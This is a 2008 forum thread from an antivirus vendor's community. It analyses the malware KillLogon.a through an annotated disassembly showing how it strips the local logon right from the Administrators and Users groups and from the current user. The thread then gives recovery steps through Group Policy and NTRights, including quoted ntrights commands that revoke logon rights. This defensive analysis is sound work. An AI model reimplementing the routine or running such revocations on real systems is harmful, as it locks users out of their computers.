微点交流论坛 - 主动防御 - 恶意程序Malware.Win32.KillLogon.a 分析及其临时解决方案

» 游客: 注册 | 登录 | 帮助

微点交流论坛 » 主动防御 » 恶意程序Malware.Win32.KillLogon.a 分析及其临时解决方案

点饭的百度空间
银牌会员

积分 2315
发帖 2236
注册 2007-11-30

#1 恶意程序Malware.Win32.KillLogon.a 分析及其临时解决方案

该程序执行后先删除administrators、users组的SeInteractiveLogonRight（本地或交互式登陆特权），然后在删当前用户的，删完后交互式登陆无法进行验证，导致用户无法从本地登陆计算机系统。分析如下：

004010B0          /$ 83EC 34       sub esp,34
004010B3          |. B9 06000000    mov ecx,6
004010B8          |. 33C0          xor eax,eax
004010BA          |. 56             push esi
004010BB          |. 57             push edi
004010BC          |. 8D7C24 24       lea edi,dword ptr ss:[esp+24]
004010C0          |. F3:AB          rep stos dword ptr es:[edi]
004010C2          |. 8D4424 08       lea eax,dword ptr ss:[esp+8]
004010C6          |. 8D4C24 24       lea ecx,dword ptr ss:[esp+24]
004010CA          |. 50             push eax
004010CB          |. 68 000000E0    push E0000000
004010D0          |. 51             push ecx
004010D1          |. 6A 00          push 0
004010D3          |. E8 E4000000    call <jmp.&ADVAPI32.LsaOpenPolicy>
004010D8          |. 85C0          test eax,eax
004010DA          |. 0F85 9F000000 jnz test.0040117F
004010E0          |. 6A 64          push 64
004010E2          |. C74424 14 F40100>mov dword ptr ss:[esp+14],1F4
004010EA          |. E8 DE000000    call test.004011CD
004010EF          |. 83C4 04       add esp,4
004010F2          |. 8BF0          mov esi,eax
004010F4          |. 8D5424 14       lea edx,dword ptr ss:[esp+14]
004010F8          |. 8D4424 0C       lea eax,dword ptr ss:[esp+C]
004010FC          |. 52             push edx
004010FD          |. 50             push eax
004010FE          |. 8B4424 48       mov eax,dword ptr ss:[esp+48]
00401102          |. 8D4C24 18       lea ecx,dword ptr ss:[esp+18]
00401106          |. 56             push esi
00401107          |. 8D5424 24       lea edx,dword ptr ss:[esp+24]
0040110B          |. 51             push ecx
0040110C          |. 52             push edx
0040110D          |. 50             push eax
0040110E          |. 6A 00          push 0
00401110          |. C74424 28 640000>mov dword ptr ss:[esp+28],64
00401118          |. FF15 08504000 call dword ptr ds:[<&ADVAPI32.LookupAccountNameA>] ; ADVAPI32.LookupAccountNameA
0040111E          |. 85C0          test eax,eax
00401120          |. 75 06          jnz short test.00401128
00401122          |. FF15 1C504000 call dword ptr ds:[<&KERNEL32.GetLastError>]       ; [GetLastError
00401128          |> 56             push esi
00401129          |. E8 94000000    call test.004011C2
0040112E          |. 6A 08          push 8
00401130          |. E8 98000000    call test.004011CD
00401135          |. 8B4C24 4C       mov ecx,dword ptr ss:[esp+4C]
00401139          |. 83C4 08       add esp,8
0040113C          |. 8BF0          mov esi,eax
0040113E          |. 8D5424 18       lea edx,dword ptr ss:[esp+18]
00401142          |. 6A 01          push 1
00401144          |. 56             push esi
00401145          |. 894E 04       mov dword ptr ds:[esi+4],ecx
00401148          |. 66:C746 02 2E00 mov word ptr ds:[esi+2],2E
0040114E          |. 66:C706 2E00    mov word ptr ds:[esi],2E
00401153          |. 8B4424 10       mov eax,dword ptr ss:[esp+10]
00401157          |. 6A 00          push 0 //还好不是纯粹搞破坏，只删了俺的SeInteractiveLogonRight，只是交互式登陆受影响。
00401159          |. 52             push edx
0040115A          |. 50             push eax
0040115B          |. E8 56000000    call <jmp.&ADVAPI32.LsaRemoveAccountRights>
00401160          |. 85C0          test eax,eax
00401162          |. 74 23          je short test.00401187
00401164          |. 85F6          test esi,esi
00401166          |. 74 09          je short test.00401171
00401168          |. 56             push esi
00401169          |. E8 54000000    call test.004011C2
0040116E          |. 83C4 04       add esp,4
00401171          |> 8B4424 08       mov eax,dword ptr ss:[esp+8]
00401175          |. 85C0          test eax,eax
00401177          |. 74 06          je short test.0040117F
00401179          |. 50             push eax
0040117A          |. E8 31000000    call <jmp.&ADVAPI32.LsaClose>
0040117F          |> 5F             pop edi
00401180          |. 33C0          xor eax,eax
00401182          |. 5E             pop esi
00401183          |. 83C4 34       add esp,34
00401186          |. C3             retn
00401187          |> 85F6          test esi,esi
00401189          |. 74 09          je short test.00401194
0040118B          |. 56             push esi
0040118C          |. E8 31000000    call test.004011C2
00401191          |. 83C4 04       add esp,4
00401194          |> 8B4424 08       mov eax,dword ptr ss:[esp+8]
00401198          |. 85C0          test eax,eax
0040119A          |. 74 06          je short test.004011A2
0040119C          |. 50             push eax
0040119D          |. E8 0E000000    call <jmp.&ADVAPI32.LsaClose>
004011A2          |> 5F             pop edi
004011A3          |. B8 01000000    mov eax,1
004011A8          |. 5E             pop esi
004011A9          |. 83C4 34       add esp,34
004011AC          \. C3             retn
00401000          /$ 83EC 24       sub esp,24
00401003          |. 56             push esi
00401004          |. 68 64604000    push test.00406064                                  ; UNICODE "SeInteractiveLogonRight"
00401009          |. 68 54604000    push test.00406054                                  ; ASCII "Administrators"
0040100E          |. E8 9D000000    call test.004010B0
00401013          |. 68 64604000    push test.00406064                                  ; UNICODE "SeInteractiveLogonRight"
00401018          |. 68 4C604000    push test.0040604C                                  ; ASCII "Users"
0040101D          |. 8BF0          mov esi,eax
0040101F          |. E8 8C000000    call test.004010B0 //对准Administrators，Users组开火
00401024          |. 83C4 10       add esp,10
00401027          |. 85C0          test eax,eax
00401029          |. 74 03          je short test.0040102E
0040102B          |. 83C6 02       add esi,2
0040102E          |> 8D4424 04       lea eax,dword ptr ss:[esp+4]
00401032          |. 8D4C24 08       lea ecx,dword ptr ss:[esp+8]
00401036          |. 50             push eax                                           ; /pBufCount
00401037          |. 51             push ecx                                           ; |Buffer
00401038          |. C74424 0C 1E0000>mov dword ptr ss:[esp+C],1E                         ; |
00401040          |. FF15 10504000 call dword ptr ds:[<&ADVAPI32.GetUserNameA>]       ; \GetUserNameA
00401046          |. 8D5424 08       lea edx,dword ptr ss:[esp+8]
0040104A          |. 68 64604000    push test.00406064                                  ; UNICODE "SeInteractiveLogonRight"
0040104F          |. 52             push edx
00401050          |. E8 5B000000    call test.004010B0 //开始瞄准当前用户
00401055          |. 83C4 08       add esp,8
00401058          |. 85C0          test eax,eax
0040105A          |. 74 03          je short test.0040105F
0040105C          |. 83C6 04       add esi,4
0040105F          |> 83FE 01       cmp esi,1
00401062          |. 74 27          je short test.0040108B
00401064          |. 83FE 03       cmp esi,3
00401067          |. 74 22          je short test.0040108B
00401069          |. 83FE 07       cmp esi,7
0040106C          |. 74 1D          je short test.0040108B
0040106E          |. 68 00000400    push 40000                                        ; /Style = MB_OK|MB_APPLMODAL|40000
00401073          |. 6A 00          push 0                                              ; |Title = NULL
00401075          |. 68 40604000    push test.00406040                                  ; |Text = "操作失败"
0040107A          |. 6A 00          push 0                                              ; |hOwner = NULL
0040107C          |. FF15 B8504000 call dword ptr ds:[<&USER32.MessageBoxA>]          ; \MessageBoxA
00401082          |. 33C0          xor eax,eax
00401084          |. 5E             pop esi
00401085          |. 83C4 24       add esp,24
00401088          |. C2 1000       retn 10
0040108B          |> 68 00000400    push 40000                                        ; /Style = MB_OK|MB_APPLMODAL|40000
00401090          |. 68 3C604000    push test.0040603C                                  ; |Title = "OK"
00401095          |. 68 30604000    push test.00406030                                  ; |Text = "操作成功"
0040109A          |. 6A 00          push 0                                              ; |hOwner = NULL
0040109C          |. FF15 B8504000 call dword ptr ds:[<&USER32.MessageBoxA>]          ; \MessageBoxA //让你得意洋洋了，我去修机器。
004010A2          |. 33C0          xor eax,eax
004010A4          |. 5E             pop esi
004010A5          |. 83C4 24       add esp,24
004010A8          \. C2 1000       retn 10

临时修复方案：以管理员权限以网络方式登陆进行如下操作即可恢复。

解决方案一：使用组策略添加权限如下字数限制请见2楼：

[ Last edited by 点饭的百度空间 on 2008-8-21 at 18:20 ]

※ ※ ※ 本文纯属【点饭的百度空间】个人意见，与【微点交流论坛】立场无关※ ※ ※

你的微笑 is 微点的骄傲！
http://hi.baidu.com/new/micropoint

2008-8-21 18:16

点饭的百度空间
银牌会员

积分 2315
发帖 2236
注册 2007-11-30

#2

解决方案一：使用组策略添加权限如下
计算机设置——windows设置——安全设置——本地策略——用户权利指派——双击在本地登陆

点击添加用户或组

点击对象类型，勾选组

依次添加administrators，users，中毒时当前用户名即可解决。

解决方案二：使用微软的NTRights.exe重新设置用户权限，下载工具包以及详细说明如下：

下载地址：
http://download.microsoft.com/do ... 25fe057/rktools.exe

可使用 NTRights.exe 实用工具来允许或拒绝用户对用户和组从命令行或批处理文件权限。 NTRights.exe 实用程序包括在 Windows NT Server 4.0 资源工具包 Supplement 3 中。
NTRights.exe 工具使用下列语法：

ntrights + R - / r user_right - u & quot account _ m\\computer_name " name " -

位置：
• + R 用于添加用户权限。
• - -r 用于撤消用户权限。
• user_right 是要授予或废除用户权利。
• " 帐户 _name " 是用户或组（用引号括起来）正在修改其用户权限的名称。
• 计算机名是其中用户权限被更改远程计算机的名称。如果 m 选项和计算机名未指定, 本地计算机上发生更改 -。

能够设置权限为用户或组, 必须管理员特权。下表列出可通过使用 NTRights.exe 实用程序更改用户权限。

备注：以下：用户权利区分和必须键入完全与下面显示：
WindowsNT 右侧允许用户以
SeAssignPrimaryTokenPrivilege 替换进程级令牌
SeAuditPrivilege 生成安全审核
SeBackupPrivilege 备份文件和目录
SeBatchLogonRight 作为批处理作业登录
SeChangeNotifyPrivilege 绕过遍历检查
SeCreatePagefilePrivilege 创建页面文件
SeCreatePermanentPrivilege 创建永久共享对象
SeCreateTokenPrivilege 创建令牌对象
SeDebugPrivilege 调试程序
SeIncreaseBasePriorityPrivilege 增加调度优先级
SeIncreaseQuotaPrivilege 增加配额
SeInteractiveLogonRight 本地登录
SeLoadDriverPrivilege 加载和卸载设备驱动程序
SeLockMemoryPrivilege 内存中锁定页
SeMachineAccountPrivilege 将工作站添加到域
SeNetworkLogonRight 从网络访问此计算机
SeProfileSingleProcessPrivilege 配置单一进程
SeRemoteShutdownPrivilege 从远程系统强制关机
SeRestorePrivilege 还原文件和目录
SeSecurityPrivilege 管理审核和安全日志
SeServiceLogonRight 作为服务登录
SeShutdownPrivilege 关闭系统
SeSystemEnvironmentPrivilege 修改固件环境值
SeSystemProfilePrivilege 配置系统性能
SeSystemtimePrivilege 更改系统时间
SeTakeOwnershipPrivilege 取得文件或其他对象的所有权
SeTcbPrivilege 充当操作系统的一部分
SeUnsolicitedInputPrivilege 从终端设备读取未经请求的输入

示例：可使用 NTRights.exe 实用程序来选择性地撤消本地登录权限在本地计算机上以便只是本地 Administrators 组成员可登录。基于 Windows NT Workstation 4.0 计算机上默认以下组具有本地登录用户权限：
• 管理员
• 备份操作员
• 所有人
• 来宾
• PowerUsers
• 用户

要撤消本地登录用户权限对于所有组但本地 Administrators 组, 批处理文件中包含以下命令：

ntrights -r SeInteractiveLogonRight - u " BackupOperators "
ntrights -r SeInteractiveLogonRight - u " Everyone "
ntrights -r SeInteractiveLogonRight - u " Guests "
ntrights -r SeInteractiveLogonRight - u " 超级用户 "
ntrights -r SeInteractiveLogonRight - u " 用户 "

有关使用 NTRights.exe 实用工具, 详细信息请参阅 Windows NT Server 4.0 资源工具包 Supplement 3 中包含 RKTools.hlp 文件。

BY:unknown author

Ｅ网行天下，
十指踏乾坤。
走我不平路，
拜会鬼魅人。

※ ※ ※ 本文纯属【点饭的百度空间】个人意见，与【微点交流论坛】立场无关※ ※ ※

你的微笑 is 微点的骄傲！
http://hi.baidu.com/new/micropoint

2008-8-21 18:17

tustin
版主

积分 5092
发帖 5067
注册 2007-3-10
来自重庆

#3

我再给楼主增加一个防御方案：使用微点主动防御软件

※ ※ ※ 本文纯属【tustin】个人意见，与【微点交流论坛】立场无关※ ※ ※

Micropoint微點——克服滯后殺毒缺陷開創主動防御時代

2008-8-21 21:56

间空度百的饭点
新手上路

积分 20
发帖 20
注册 2008-8-14

#4

嗯，使用微点主动防御软件防止一切未知病毒、恶意程序

※ ※ ※ 本文纯属【间空度百的饭点】个人意见，与【微点交流论坛】立场无关※ ※ ※

嘿！看什么看，我就是那个总是头朝下的。。。

2008-8-21 22:09

wojiliang
新手上路

积分 18
发帖 16
注册 2008-8-25

#5

学习一下了````

※ ※ ※ 本文纯属【wojiliang】个人意见，与【微点交流论坛】立场无关※ ※ ※

2008-8-25 15:03

论坛跳转:

可打印版本 | 推荐 | 订阅 | 收藏

[ 联系我们 - 东方微点 ] 北京东方微点信息技术有限责任公司福建东方微点信息安全有限责任公司闽ICP备05030815号